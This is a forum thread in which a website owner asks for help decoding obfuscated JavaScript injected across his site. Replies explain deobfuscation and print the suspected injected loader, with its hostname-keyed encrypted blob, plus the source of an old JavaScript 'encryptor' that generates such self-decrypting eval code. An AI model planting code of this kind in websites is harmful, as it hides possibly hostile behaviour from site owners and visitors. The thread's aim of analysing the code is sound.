Hey guys, anyone knows of an online resource that helps us to decrypt encrypted java codes? I have a code on my website (added either by my old programmer or some hacker), which I need to decrypt and understand. Any help is appreciated. Thanks! .
Why did he use Java on a website? The browser can't use it, and if it's server-side it never goes to the browser so there's no need to encrypt it.
that's like saying it's either in New York or Japan, but which way do I go. "Encrypted" Java is compiled pseudocode. Encrypted Javascript can be any of a few different things. You can't decode anything without the code that was used to encode it. Encoding and encryption are TOTALLY different things. The only thing they have in common is that you can't read the result. Can it be decrypted? Maybe. It depends on what it is and, if it's encrypted, how it was encrypted. "Eitherway" means that you don't know, so you can't tell us, so we can't tell you. If it's encrypted Javascript, there may be a website you can use to decrypt it, but it depends on what method of encryption was used - and you can only tell that by looking at the code and having enough experience to know.
Must be javascript. If so go to http://meyerweb.com/eric/tools/dencoder/ paste it in the box, click the button. Or post the code here and someone will analyze it or at least give you some idea what to do with it. Most likely it is Base64 encoded. If it is a string of &nn; where nn is a hex number then it is just special symbol text replacement. Also easy to decode.
It is JavaScript language. I tried this website: http://meyerweb.com/eric/tools/dencoder/ but it didn't help (clicking Decode doesn't produce anything). I've attached the code to this post, if anyone is willing to take a look at it and can tell if it is Base64 or whatever. View attachment JavaScript Code.txt
It's encoded in at least 3 different ways, and it's incomplete. (It ends with 'for(h3=1;h3'.) If you change the encode at the beginning to document.write and paste it into a blank document, then load that document into your browser, you'll decode part of it. You'll probably need to do a String.fromCharCode() on the remainder.
The following is a simple way to decode encoded java script. Use notepad++ in extended mode to split into readable lines once you have the first iteration To decode this sort of thing just change the eval to document.write and run in the browser. Look at what you see. select all, copy and paste into your editor. This code has additional embedded evals. Just take each of those add script tags, change the eval to document writes and repeat the process. Combine all the code back together. I suspect the end was chopped off due to the size limitations in the txt file Doing this yields the following - I cleaned it up in notepad++ by changing ";" to ";\r\n" and did some indenting I changed the one line to shorten it and eliminate the really long code string. First iteration - to illustrate h5=0;h0='%74%69%6F%6E%2E%68%6F%73%74%6E%61%6D%65%3B'; function h15(h11) { h8=Math.round(h11/4096-.5); h13=h11-h8*4096; h9=Math.round(h13/256-.5); h14=h13-h9*256; h10=Math.round(h14/16-.5); h16=h14-h10*16; return(''+h19(h10)+h19(h16)); } h2='%53%5F%13%41%0E%0C%19%0A%1E%45%19% << deleted end for space in the post function h19(h21) { if(h21<10)return h21; else return String.fromCharCode(h21+55); } h4=''; h7='%68%36%3D%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61'; h1=h2.split('%'); eval(unescape(h7+h0)); h17='%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%68%34%29%29'; for(h3=1; h3
Thanks davetrebas and everyone, but I really don't understand what this means and I'm not a coder. I just want to know what the code functions for: 1- What it calls 2- From where? 3- And Why? to achieve what function? And whether it has only one task/function or more......etc. If someone can really tell in details (and can tweak if necessary), I'm willing to pay (perhaps I should post this in the services section).
This is pretty confusing since the code is incomplete, however google search gave me the whole code. This is the deobfuscated code: h5 = 0; function h15(h11) { h8 = Math.round(h11 / 4096 - .5); h13 = h11 - h8 * 4096; h9 = Math.round(h13 / 256 - .5); h14 = h13 - h9 * 256; h10 = Math.round(h14 / 16 - .5); h16 = h14 - h10 * 16; return ('' + h19(h10) + h19(h16)); } h2 = '%53%5F%13%41%0E%0C%19%0A%1E%45%19%4C%17%16%15%13%1C%4A%0E%1A%1D%17%1D%07%08%40%4B%46%16%7D%7D%01%4F%1F%59%11%17%00%75%51%16%00%53%49%57%0B%07%1F%4F%37%15%1D%0B%4F%07%58%65%1B%16%05%57%4A%02%29%1B%1F%03%11%0D%42%41%5D%17%18%0A%09%01%0A%5B%53%0B%5C%52%59%08%1C%4A%5E%4C%7D%0E%04%1F%54%47%14%5E%60%0D%15%00%54%56%58%5F%48%48%03%19%0C%49%4E%0E%18%65%4D%7D%7E%12%56%1D%3D%15%1B%15%1F%43%07%11%27%1D%1A%00%4A%0D%17%03%30%08%1A%02%00%04%0A%19%23%1E%1A%4B%45%50%54%44%50%19%02%56%4F%53%42%47%45%48%48%59%43%54%43%4E%56%1E%53%5F%44%5E%4C%7D%27%49%57%17%00%1F%5A%59%07%4D%54%16%45%50%15%03%1C%54%58%49%49%17%43%06%48%41%57%0C%57%4B%15%09%1D%1D%15%42%0A%42%00%0B%04%33%04%16%0D%4F%0E%5D%52%64%6E%24%6A%4B%43%13%18%23%47%00%1C%1B%1A%04%19%10%45%16%1C%19%12%0C%06%4F%43%53%47%5C%5E%57%02%43%09%18%19%14%03%47%02%17%5C%46%0B%3B%39%46%4D%54%15%59%15%0D%18%03%1A%13%01%1A%3C%46%11%0A%0B%4A%54%48%59%50%4C%45%5F%2D%16%19%4C%15%1C%04%38%15%07%06%47%5A%4F%49%41%48%7C%16%01%4D%07%18%07%61%1D%1C%1A%4F%16%44%5E%01%11%1A%1B%19%45%0D%06%0C%16%54%06%00%47%42%0C%0E%09%7D%7D%0A%07%56%73%7E%12%4B%38%3A%68%6F%7A%50%59%03%0C%46%1F%1C%04%26%1E%02%40%43%52%4D%11%02%19%4D%19%10%1B%01%58%18%4B%68%6C%7A%5B%58%24%06%0C%0A%17%7E%63%64%6E%27%69%66%64%58%58%57%61%1F%10%13%06%1E%50%5C%68%6C%7A%04%18%15%2B%2C%4F%4E%54%4D%46%13%46%0A%1C%44%59%16%03%5A%1F%51%53%1D%15%5D%17%4B%5E%53%5B%58%22%07%1C%4F%23%1B%19%1B%17%0E%2D%0E%00%12%7D%7E%27%1D%16%04%3A%22%7D%10%5F%45%57%5C%03%0D%0B%1B%46%5D%15%1D%1A%15%06%44%07%1F%12%11%50%07%56%59%5B%40%37%54%44%42%35%1C%04%02%15%42%00%1D%16%12%49%1A%08%0E%07%0A%0B%1E%19%12%0E%1E%10%0E%0A%7A%38%39%68%6C%7A%5B%58%35%17%04%03%53%25%1C%0B%15%57%43%49%4D%21%16%05%47%0C%1B%18%0A%03%11%56%10%0A%1E%54%1F%17%07%0E%4F%26%26%25%64%6E%27%12%1A%08%05%0E%4A%0E%1D%16%04%3A%22%7D%1E%11%15%1F%1D%03%4D%45%57%48%5A%4F%63%67%6E%4A%0A%02%50%57%06%02%4B%1F%00%2F%5E%2D%1F%43%12%09%1A%00%5F%42%44%4F%46%48%7E%60%67%17%41%13%38%04%13%03%1F%0E%50%59%10%06%1D%6A%00%3F%4B%00%04%1B%0C%16%40%48%4E%53%40%35%56%73%58%4F%42%58%30%12%5A%1E%59%00%07%15%11%56%0B%17%00%00%57%14%17%0D%1D%0A%54%1A%1A%15%47%0D%08%4D%01%16%1B%5B%08%73%7D%66%7A%38%39%68%6C%7A%5B%58%23%03%0C%0A%53%1D%07%4E%13%46%06%4F%3D%18%07%02%5E%4D%18%1A%0B%50%50%54%06%45%10%18%18%16%07%48%0D%06%00%1D%01%09%24%6A%66%49%5F%50%54%09%4D%52%54%1F%1F%41%79%26%4C%5D%12%16%01%07%21%01%5B%5D%47%0D%14%5D%4B%14%4D%50%00%1E%4A%19%11%53%55%50%7F%45%0F%07%16%06%5F%45%12%07%1F%24%1D%0D%1A%0F%0E%4A%4F%10%5E%59%07%5C%08%09%11%01%14%19%17%5E%04%53%1C%05%00%04%55%4D%50%56%49%0D%0B%4F%10%1C%50%55%14%1B%41%1E%1C%56%51%4C%58%5D%05%45%00%06%14%58%40%0B%03%1C%07%0C%31%17%41%13%41%1D%19%10%55%0E%0E%15%15%1C%03%0C%12%00%11%1D%2B%14%09%0D%1B%0A%51%54%1D%07%13%42%06%52%4F%34%1B%18%5D%08%59%23%06%1E%55%5F%15%47%53%15%1B%11%5F%4A%2C%1F%1B%1A%0B%45%0E%4C%51%51%58%16%49%09%44%42%7E%66%79%3B%39%6B%4A%5C%30%12%03%0B%06%0A%53%19%08%1C%00%47%0D%4F%0B%18%05%57%4D%08%17%00%0A%02%11%51%0E%0C%14%1A%1A%00%0C%1C%4F%5B%02%0C%1C%13%47%00%0E%01%57%5C%57%46%02%0B%1D%15%1F%5F%44%03%09%5A%54%5A%45%15%0D%4F%12%10%0D%4E%5F%1E%43%1B%02%57%03%1F%4B%4D%11%11%06%17%59%44%4D%12%1A%10%03%0D%42%1C%00%53%15%0A%0D%08%43%0C%0B%0C%03%12%57%48%02%0B%54%1B%18%54%10%12%04%17%10%1E%0B%05%48%44%53%16%06%1C%03%4B%11%4F%1A%1E%13%03%46%4D%1D%11%09%19%5F%55%06%45%1A%1A%57%11%0A%0D%4F%10%07%1A%64%6E%27%15%0E%1F%57%07%18%5E%20%18%06%08%24%5E%40%42%58%53%5C%53%4D%45%4B%48%53%5F%49%1E%08%5E%2A%2B%44%59%1F%12%47%0A%11%00%47%59%11%1B%42%5D%43%5D%57%4A%42%5A%54%79%7D%60%18%06%5C%43%1F%02%07%3A%16%5C%0A%35%11%09%04%11%0D%42%4D%57%5C%50%46%45%48%44%53%04%06%1E%2E%6A%4A%41%1A%1E%13%03%46%45%50%54%44%50%09%00%4B%45%5C%54%45%5E%68%61%66%79%7D%60%41%48%6F%13%1F%01%0E%57%3A%4F%1F%1E%1D%01%50%45%5F%42%35%1C%04%02%15%68%61%66%57%5C%4E%4D%40%0E%48%4F%1D%18%07%3E%6A%44%57%17%1C%03%19%4B%42%6F%7A%7D%7E%42%0F%09%1D%14%1D%07%43%13%41%13%48%4D%4D%57%5A%5E%02%09%39%0E%02%56%64%0D%15%5F%7E%7E%6C%6B%4F%02%12%06%0E%07%09%03%0F%0A%0B%03%50%57%14%4D%54%04%00%00%7C%51%10%02%3F%11%11%11%68%61%66%0E%5D%52%64%6E%27%69%66%64%58%58%31%4F%09%1C%54%06%1E%11%72%03%06%18%13%05%0A%17%06%0B%79%7D%60%4A%4F%09%01%00%09%0E%50%5E%00%0C%09%04%0A%1E%55%18%45%59%17%1D%01%45%0B%0C%52%51%12%08%0A%02%0C%5D%53%42%13%1E%01%10%4A%50%4F%4F%5F%1E%71%06%01%53%00%1F%00%42%0E%0E%17%11%49%02%06%57%06%1D%4D%03%18%57%4C%02%0D%00%00%1D%11%5F%04%45%07%1C%12%45%00%07%0B%0A%54%1D%0F%00%00%69%66%64%53%5F%50%0D%0B%18%10%0A%57%18%1E%01%16%00%5C%0C%42%04%01%03%07%11%1B%49%47%14%43%48%0C%1B%07%1F%4F%45%16%04%0E%13%58%44%1B%58%4B%44%5E%42%1F%41%41%15%15%0D%0B%2E%40%4B%46%56%57%58%58%68%0C%1D%11%4F%19%5F%10%16%0D%16%54%11%04%06%0D%4F%1F%15%10%0B%15%0E%69%66%64%7D%7E%0A%15%67%73%7D%40%5F%66%58%07%0B%53%0D%18%10%42%0B%03%1A%17%02%4E%08%40%43%0E%4D%1B%1E%19%45%4D%0E%1D%1B%18%11%53%0E%04%00%07%57%0A%04%48%1F%1C%04%05%07%00%46%17%4F%0C%19%13%57%5A%05%1C%54%07%02%54%56%42%16%07%15%05%11%11%48%18%1A%00%01%4E%06%0E%40%4F%67%7E%53%5F%09%0C%57%04%00%00%5D%59%05%0D%07%2F%1F%17%07%0E%31%4E%57%34%49%4E%00%00%03%04%14%1C%5F%48%18%17%17%1B%19%5E%5E%4A%4C%53%0F%7D%6C%6B%4C%47%07%1C%00%1D%4E%00%13%00%1D%38%07%12%40%45%50%4F%4F%5F%1E%62%17%0B%53%04%18%15%2D%18%0A%1D%54%0F%1B%09%4D%17%06%02%19%57%18%40%4D%1A%18%06%13%5A%3A%6B%6C%01%11%03%10%10%06%4F%15%15%05%1D%02%15%69%66%10%5E%4C%7D%27%67%70%7E%66%5F%1E%73%0E%0A%00%11%57%35%0D%18%1A%03%07%49%0F%09%4A%43%29%0C%13%12%57%62%0C%00%11%1D%7A%38%14%4A%42%12%5A%14%09%0D%1B%0A%5F%54%4A%08%06%4A%06%48%44%59%1B%1E%58%08%51%53%0C%1C%58%53%09%42%5F%54%11%10%0C%0B%1B%1A%1B%07%46%4E%0E%18%4F%42%58%20%1F%4B%03%59%17%03%19%52%5B%0B%0B%14%54%18%0B%42%1C%07%16%54%0A%02%08%5D%06%4F%02%05%57%11%4F%09%1C%54%03%11%48%55%10%4B%5D%5A%7D%6C%42%48%66%57%5C%4E%4D%01%4F%07%0A%4D%5B%57%59%5E%02%09%01%1F%2F%53%5C%0D%06%18%53%5E%4B%04%09%0B%16%3B%1C%1A%4F%07%58%4F%42%58%11%16%4A%08%59%00%07%15%5C%10%00%0A%07%1C%57%0A%17%1C%65%7A%7D%4D%46%40%0D%05%0E%09%12%50%5E%00%1F%1C%19%00%06%54%18%4B%5E%79%7D%7E%17%07%1C%1A%01%1A%49%08%06%42%10%0A%56%7D%7E%0A%07%56%73%7E%65%79%41%5F%12%2A%03%11%19%6F%6B%62%12%5A%4F'; function h19(h21) { if (h21 < 10) return h21; else return String.fromCharCode(h21 + 55); } h4 = ''; h6=document.location.hostname; h1 = h2.split('%'); for (h3 = 1; h3 < h1.length; h3++) { h4 += unescape('%' + h15(unescape('%' + h1[h3]).charCodeAt(0) ^ h6.charCodeAt(h5))); h5++; if (h5 == h6.length) h5 = 0; }; // Original code was evaling the unescaped stuff document.write("<pre>"); document.write(unescape(h4)); document.write("<br />"); document.write("<br />"); document.write(unescape(h17)); document.write("</pre>"); Code (markup): I didn't eval the code so I have no idea what this does, but the code is an ASCII to Hex generator. Further googling led me to this: <html> <head> <!-- This file retrieved from the JS-Examples archives http://www.js-examples.com 1000s of free ready to use scripts, tutorials, forums. Author: Elviro Mirko - 0 --> <SCRIPT language=Javascript> <!-- //##################################################################// // // ASCII 2 Hex Conversion Tool // // Used to encrypt Javascript into // Hexidecimal to hide it from sniffers. // // Copyright 1999 Kendall Dawson // Permission to freely distribute // as long as this copyright notice // remains unaltered. Contact me via // email: kendall@paradigm.nu // web: http://www.paradigm.nu // // Release History: // // Version 1.0 - July 1999 // Version 1.1 - August 2002 by Elviro Mirko (beast2@freemail.it) // Added stronger encryption // Version 1.2 - November 2002 by Elviro Mirko (beast2@freemail.it) // Less output to copy and paste // //##################################################################// function decode(){ if(document.forms[0].hextext.value == ''){ alert('There is nothing to decode!'); void(0); } else { var i,j,t j=0 document.forms[0].asciitext.value = ''; var text= document.forms[0].hextext.value; arr = text.split('%') for (i=1;i<arr.length;i++){ t = '%'+hexfromdec( unescape('%'+arr[i]).charCodeAt(0) ^ document.forms[0].urld.value.charCodeAt(j)) document.forms[0].asciitext.value += unescape(t); j++ if (j==document.forms[0].urld.value.length) j=0 } document.forms[0].hextext.value= ''; } } function encode(){ if(document.forms[0].asciitext.value == ''){ alert('There is nothing to encode!'); void(0); } else if(document.forms[0].urld.value == ''){ alert('There is no URL specified!'); void(0); } else { var text= document.forms[0].asciitext.value; enctext= transform(text,1); document.forms[0].asciitext.value= ''; document.forms[0].hextext.value= (enctext); } } function transform(s,k){ var hex='' var i,j,t j=0 for (i=0; i<s.length; i++) { // for debugging: // alert('Hex values are:' + hexfromdec( s.charCodeAt(i) )); // break; if (k==0) { t = hexfromdec( s.charCodeAt(i) ) if (t=='25') t='' hex += '%' + t } else { hex += '%' + hexfromdec( s.charCodeAt(i) ^ document.forms[0].urld.value.charCodeAt(j) ) j++ if (j==document.forms[0].urld.value.length) j=0 } } return hex } function generate(){ if(document.forms[0].hextext.value == ''){ alert('There is nothing to generate code from!'); void(0); } else { var text= document.forms[0].hextext.value; var text2="h5=0;h0='%6D%65%6E%74%2E%55%52%4C%3B';function h15(h11){h8=Math.round(h11/4096-.5);h13=h11-h8*4096;h9=Math.round(h13/256-.5);h14=h13-h9*256;h10=Math.round(h14/16-.5);h16=h14-h10*16;return(''+h19(h10)+h19(h16));}h2='" text2=text2+text text3="';function h19(h21){if(h21<10)return h21;else return String.fromCharCode(h21+55);}h4='';h7='%68%36%3D%64%6F%63%75';h1=h2.split('%');eval(unescape(h7+h0));h17='%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%68%34%29%29';for(h3=1;h3<h1.length;h3++){h4+=unescape('%'+h15(unescape('%'+h1[h3]).charCodeAt(0)^h6.charCodeAt(h5)));h5++;if(h5==h6.length)h5=0;};eval(unescape(h17))" genCode=window.open("","codeWin","height=400,width=600,scrollbars=yes"); genCode.document.write("<HTML><HEAD><TITLE>Cut and Paste the Encoded Text Below</TITLE></HEAD>"); genCode.document.write("<BODY BGCOLOR='white'>"); genCode.document.write("<TABLE align=center><TR><TD>"); genCode.document.write("<FONT SIZE='2' face='Courier'>"); genCode.document.write("<Script Language=Javascript>"); genCode.document.write("<BR><!--<BR>"); genCode.document.write("eval(unescape('" + transform(text2,0) + transform(text3,0) +"'));"); genCode.document.write("<BR>//--><BR>"); genCode.document.write("</Script><BR>"); genCode.document.write("</FONT></TD></TR></TABLE><CENTER><FORM>"); genCode.document.write("<INPUT TYPE=button value=' Close Window ' onClick='self.close()'>"); genCode.document.write("</FORM></CENTER></BODY></HTML>"); genCode.document.close(); } } // ------------ begin conversion routine ---------- // these are the functions that actually convert // from decimal ascii to hexidecimal ascii code function hexfromdec(num) { if (num > 65535) { return ("err!") } first = Math.round(num/4096 - .5); temp1 = num - first * 4096; second = Math.round(temp1/256 -.5); temp2 = temp1 - second * 256; third = Math.round(temp2/16 - .5); fourth = temp2 - third * 16; return (""+getletter(third)+getletter(fourth)); } function getletter(num) { if (num < 10) { return num; } else { if (num == 10) { return "A" } if (num == 11) { return "B" } if (num == 12) { return "C" } if (num == 13) { return "D" } if (num == 14) { return "E" } if (num == 15) { return "F" } } } // --------------- end conversion routine -------------- //--> </SCRIPT> </head> <body> <CENTER><FONT size=5>ASCII 2 HEX v1.2 (JavaScript Encryptor):</FONT><BR><FONT size=2>Original version (1.1) by Kendall Dawson <BR>Version 1.2 by Elviro Mirko</FONT></CENTER> <FORM name=code> <TABLE cellSpacing=5 cellPadding=10 width=620 align=center border=2> <TBODY> <TR vAlign=center align=middle> <TD vAlign=top bgColor=#fffef2 colSpan=2><FONT size=-1>Insert the destination URL of the page that will contain this javascript code (i.e. "http://www.js-examples.com/").<BR>NOTE: <U><STRONG>Your script will be protected and will not work in any other page!</STRONG></U></FONT> <P><B>Destination URL: </B><INPUT size=55 name=urld> </P></TD></TR> <TR vAlign=center align=middle> <TD vAlign=top bgColor=#f2feff><B>ASCII Text:</B><BR><TEXTAREA name=asciitext rows=5 wrap=virtual cols=30></TEXTAREA><BR><INPUT onclick=encode() type=button value=" Encode It "> <INPUT type=reset value=" Clear "> <P align=left><FONT size=-1>You must put valid javascript in this box - not standard HTML! Cut and paste (or write by hand) your Javascript code here. Do not include the <SCRIPT> or <!-- comment //--> tags! (They will be added later)</FONT></P> <P align=left><FONT size=2>NB: <STRONG>use "% " (% + space) instead of "%" in your js code, or it will be encrypted incorrectly!</STRONG></FONT></P></TD> <TD vAlign=top bgColor=#fafff9><B>Hexidecimal <FONT color=red>Encrypted</FONT> Value:</B><BR><TEXTAREA name=hextext rows=5 wrap=virtual cols=30></TEXTAREA><BR><INPUT onclick=decode() type=button value=" Decode It "> <INPUT type=reset value=" Clear "> <P align=left><FONT size=-1>If you want to convert Hex back to ASCII cut and paste your Hex (URL Encoded) text here. Before you can Generate Javascript code the textarea above must be filled.</FONT></P></TD></TR> <TR> <TD align=middle colSpan=2 bgcolor=#EFD5E5><FONT size=-1>When you are finished encoding your text, just hit<BR>the button below for 'instant-javascript' to cut and paste into your page!</FONT><BR><BR><INPUT onclick=generate() type=button value=" Generate JavaScript Code From Hexidecimal "></TD></TR></TBODY></TABLE></FORM><BR> </pre></xmp></noscript> <BR><center><a href='http://www.js-examples.com'>JS-Examples.com</a></center> </body> </html> Code (markup): You might want to try saving this page, find out where the code was injected and enter that as the destination URL, then put this into the HEX field: 53,5F,13,41,0E,0C,19,0A,1E,45,19,4C,17,16,15,13,1C,4A,0E,1A,1D,17,1D,07,08,40,4B,46,16,7D,7D,01,4F,1F,59,11,17,00,75,51,16,00,53,49,57,0B,07,1F,4F,37,15,1D,0B,4F,07,58,65,1B,16,05,57,4A,02,29,1B,1F,03,11,0D,42,41,5D,17,18,0A,09,01,0A,5B,53,0B,5C,52,59,08,1C,4A,5E,4C,7D,0E,04,1F,54,47,14,5E,60,0D,15,00,54,56,58,5F,48,48,03,19,0C,49,4E,0E,18,65,4D,7D,7E,12,56,1D,3D,15,1B,15,1F,43,07,11,27,1D,1A,00,4A,0D,17,03,30,08,1A,02,00,04,0A,19,23,1E,1A,4B,45,50,54,44,50,19,02,56,4F,53,42,47,45,48,48,59,43,54,43,4E,56,1E,53,5F,44,5E,4C,7D,27,49,57,17,00,1F,5A,59,07,4D,54,16,45,50,15,03,1C,54,58,49,49,17,43,06,48,41,57,0C,57,4B,15,09,1D,1D,15,42,0A,42,00,0B,04,33,04,16,0D,4F,0E,5D,52,64,6E,24,6A,4B,43,13,18,23,47,00,1C,1B,1A,04,19,10,45,16,1C,19,12,0C,06,4F,43,53,47,5C,5E,57,02,43,09,18,19,14,03,47,02,17,5C,46,0B,3B,39,46,4D,54,15,59,15,0D,18,03,1A,13,01,1A,3C,46,11,0A,0B,4A,54,48,59,50,4C,45,5F,2D,16,19,4C,15,1C,04,38,15,07,06,47,5A,4F,49,41,48,7C,16,01,4D,07,18,07,61,1D,1C,1A,4F,16,44,5E,01,11,1A,1B,19,45,0D,06,0C,16,54,06,00,47,42,0C,0E,09,7D,7D,0A,07,56,73,7E,12,4B,38,3A,68,6F,7A,50,59,03,0C,46,1F,1C,04,26,1E,02,40,43,52,4D,11,02,19,4D,19,10,1B,01,58,18,4B,68,6C,7A,5B,58,24,06,0C,0A,17,7E,63,64,6E,27,69,66,64,58,58,57,61,1F,10,13,06,1E,50,5C,68,6C,7A,04,18,15,2B,2C,4F,4E,54,4D,46,13,46,0A,1C,44,59,16,03,5A,1F,51,53,1D,15,5D,17,4B,5E,53,5B,58,22,07,1C,4F,23,1B,19,1B,17,0E,2D,0E,00,12,7D,7E,27,1D,16,04,3A,22,7D,10,5F,45,57,5C,03,0D,0B,1B,46,5D,15,1D,1A,15,06,44,07,1F,12,11,50,07,56,59,5B,40,37,54,44,42,35,1C,04,02,15,42,00,1D,16,12,49,1A,08,0E,07,0A,0B,1E,19,12,0E,1E,10,0E,0A,7A,38,39,68,6C,7A,5B,58,35,17,04,03,53,25,1C,0B,15,57,43,49,4D,21,16,05,47,0C,1B,18,0A,03,11,56,10,0A,1E,54,1F,17,07,0E,4F,26,26,25,64,6E,27,12,1A,08,05,0E,4A,0E,1D,16,04,3A,22,7D,1E,11,15,1F,1D,03,4D,45,57,48,5A,4F,63,67,6E,4A,0A,02,50,57,06,02,4B,1F,00,2F,5E,2D,1F,43,12,09,1A,00,5F,42,44,4F,46,48,7E,60,67,17,41,13,38,04,13,03,1F,0E,50,59,10,06,1D,6A,00,3F,4B,00,04,1B,0C,16,40,48,4E,53,40,35,56,73,58,4F,42,58,30,12,5A,1E,59,00,07,15,11,56,0B,17,00,00,57,14,17,0D,1D,0A,54,1A,1A,15,47,0D,08,4D,01,16,1B,5B,08,73,7D,66,7A,38,39,68,6C,7A,5B,58,23,03,0C,0A,53,1D,07,4E,13,46,06,4F,3D,18,07,02,5E,4D,18,1A,0B,50,50,54,06,45,10,18,18,16,07,48,0D,06,00,1D,01,09,24,6A,66,49,5F,50,54,09,4D,52,54,1F,1F,41,79,26,4C,5D,12,16,01,07,21,01,5B,5D,47,0D,14,5D,4B,14,4D,50,00,1E,4A,19,11,53,55,50,7F,45,0F,07,16,06,5F,45,12,07,1F,24,1D,0D,1A,0F,0E,4A,4F,10,5E,59,07,5C,08,09,11,01,14,19,17,5E,04,53,1C,05,00,04,55,4D,50,56,49,0D,0B,4F,10,1C,50,55,14,1B,41,1E,1C,56,51,4C,58,5D,05,45,00,06,14,58,40,0B,03,1C,07,0C,31,17,41,13,41,1D,19,10,55,0E,0E,15,15,1C,03,0C,12,00,11,1D,2B,14,09,0D,1B,0A,51,54,1D,07,13,42,06,52,4F,34,1B,18,5D,08,59,23,06,1E,55,5F,15,47,53,15,1B,11,5F,4A,2C,1F,1B,1A,0B,45,0E,4C,51,51,58,16,49,09,44,42,7E,66,79,3B,39,6B,4A,5C,30,12,03,0B,06,0A,53,19,08,1C,00,47,0D,4F,0B,18,05,57,4D,08,17,00,0A,02,11,51,0E,0C,14,1A,1A,00,0C,1C,4F,5B,02,0C,1C,13,47,00,0E,01,57,5C,57,46,02,0B,1D,15,1F,5F,44,03,09,5A,54,5A,45,15,0D,4F,12,10,0D,4E,5F,1E,43,1B,02,57,03,1F,4B,4D,11,11,06,17,59,44,4D,12,1A,10,03,0D,42,1C,00,53,15,0A,0D,08,43,0C,0B,0C,03,12,57,48,02,0B,54,1B,18,54,10,12,04,17,10,1E,0B,05,48,44,53,16,06,1C,03,4B,11,4F,1A,1E,13,03,46,4D,1D,11,09,19,5F,55,06,45,1A,1A,57,11,0A,0D,4F,10,07,1A,64,6E,27,15,0E,1F,57,07,18,5E,20,18,06,08,24,5E,40,42,58,53,5C,53,4D,45,4B,48,53,5F,49,1E,08,5E,2A,2B,44,59,1F,12,47,0A,11,00,47,59,11,1B,42,5D,43,5D,57,4A,42,5A,54,79,7D,60,18,06,5C,43,1F,02,07,3A,16,5C,0A,35,11,09,04,11,0D,42,4D,57,5C,50,46,45,48,44,53,04,06,1E,2E,6A,4A,41,1A,1E,13,03,46,45,50,54,44,50,09,00,4B,45,5C,54,45,5E,68,61,66,79,7D,60,41,48,6F,13,1F,01,0E,57,3A,4F,1F,1E,1D,01,50,45,5F,42,35,1C,04,02,15,68,61,66,57,5C,4E,4D,40,0E,48,4F,1D,18,07,3E,6A,44,57,17,1C,03,19,4B,42,6F,7A,7D,7E,42,0F,09,1D,14,1D,07,43,13,41,13,48,4D,4D,57,5A,5E,02,09,39,0E,02,56,64,0D,15,5F,7E,7E,6C,6B,4F,02,12,06,0E,07,09,03,0F,0A,0B,03,50,57,14,4D,54,04,00,00,7C,51,10,02,3F,11,11,11,68,61,66,0E,5D,52,64,6E,27,69,66,64,58,58,31,4F,09,1C,54,06,1E,11,72,03,06,18,13,05,0A,17,06,0B,79,7D,60,4A,4F,09,01,00,09,0E,50,5E,00,0C,09,04,0A,1E,55,18,45,59,17,1D,01,45,0B,0C,52,51,12,08,0A,02,0C,5D,53,42,13,1E,01,10,4A,50,4F,4F,5F,1E,71,06,01,53,00,1F,00,42,0E,0E,17,11,49,02,06,57,06,1D,4D,03,18,57,4C,02,0D,00,00,1D,11,5F,04,45,07,1C,12,45,00,07,0B,0A,54,1D,0F,00,00,69,66,64,53,5F,50,0D,0B,18,10,0A,57,18,1E,01,16,00,5C,0C,42,04,01,03,07,11,1B,49,47,14,43,48,0C,1B,07,1F,4F,45,16,04,0E,13,58,44,1B,58,4B,44,5E,42,1F,41,41,15,15,0D,0B,2E,40,4B,46,56,57,58,58,68,0C,1D,11,4F,19,5F,10,16,0D,16,54,11,04,06,0D,4F,1F,15,10,0B,15,0E,69,66,64,7D,7E,0A,15,67,73,7D,40,5F,66,58,07,0B,53,0D,18,10,42,0B,03,1A,17,02,4E,08,40,43,0E,4D,1B,1E,19,45,4D,0E,1D,1B,18,11,53,0E,04,00,07,57,0A,04,48,1F,1C,04,05,07,00,46,17,4F,0C,19,13,57,5A,05,1C,54,07,02,54,56,42,16,07,15,05,11,11,48,18,1A,00,01,4E,06,0E,40,4F,67,7E,53,5F,09,0C,57,04,00,00,5D,59,05,0D,07,2F,1F,17,07,0E,31,4E,57,34,49,4E,00,00,03,04,14,1C,5F,48,18,17,17,1B,19,5E,5E,4A,4C,53,0F,7D,6C,6B,4C,47,07,1C,00,1D,4E,00,13,00,1D,38,07,12,40,45,50,4F,4F,5F,1E,62,17,0B,53,04,18,15,2D,18,0A,1D,54,0F,1B,09,4D,17,06,02,19,57,18,40,4D,1A,18,06,13,5A,3A,6B,6C,01,11,03,10,10,06,4F,15,15,05,1D,02,15,69,66,10,5E,4C,7D,27,67,70,7E,66,5F,1E,73,0E,0A,00,11,57,35,0D,18,1A,03,07,49,0F,09,4A,43,29,0C,13,12,57,62,0C,00,11,1D,7A,38,14,4A,42,12,5A,14,09,0D,1B,0A,5F,54,4A,08,06,4A,06,48,44,59,1B,1E,58,08,51,53,0C,1C,58,53,09,42,5F,54,11,10,0C,0B,1B,1A,1B,07,46,4E,0E,18,4F,42,58,20,1F,4B,03,59,17,03,19,52,5B,0B,0B,14,54,18,0B,42,1C,07,16,54,0A,02,08,5D,06,4F,02,05,57,11,4F,09,1C,54,03,11,48,55,10,4B,5D,5A,7D,6C,42,48,66,57,5C,4E,4D,01,4F,07,0A,4D,5B,57,59,5E,02,09,01,1F,2F,53,5C,0D,06,18,53,5E,4B,04,09,0B,16,3B,1C,1A,4F,07,58,4F,42,58,11,16,4A,08,59,00,07,15,5C,10,00,0A,07,1C,57,0A,17,1C,65,7A,7D,4D,46,40,0D,05,0E,09,12,50,5E,00,1F,1C,19,00,06,54,18,4B,5E,79,7D,7E,17,07,1C,1A,01,1A,49,08,06,42,10,0A,56,7D,7E,0A,07,56,73,7E,65,79,41,5F,12,2A,03,11,19,6F,6B,62,12,5A,4F Code (markup): to see what it takes you to. You have to do it yourself because only you know where the injected file was. EDIT: More googling led me to this: http://webcache.googleusercontent.com/search?q=cache:bQ_-fcaeg5sJ:www.hackforums.net/archive/index.php/thread-1373212.html+&cd=2&hl=en&ct=clnk Code (markup):
Thanks tyteen4a03 for the effort and info. Like I said, (or insinuated at), I'm not a tech savvy programmer and would much prefer a clear definition and explanation of what the code does exactly. I know where it is injected. Almost in every page of my website (it was actually added by my old programmer). I know ONE function of it is to be able to display and/or call a light popover box when a page is loaded. However, I strongly believe it has at least one other function. .
Does this code work and do something useful for you? Does it run without any unwanted side effects? Try deleting it and see what happens? What does not work/happen any more. That's what the code was doing. Send me a pm with a link to the page and I will look at it further. No charge, no guarantees.
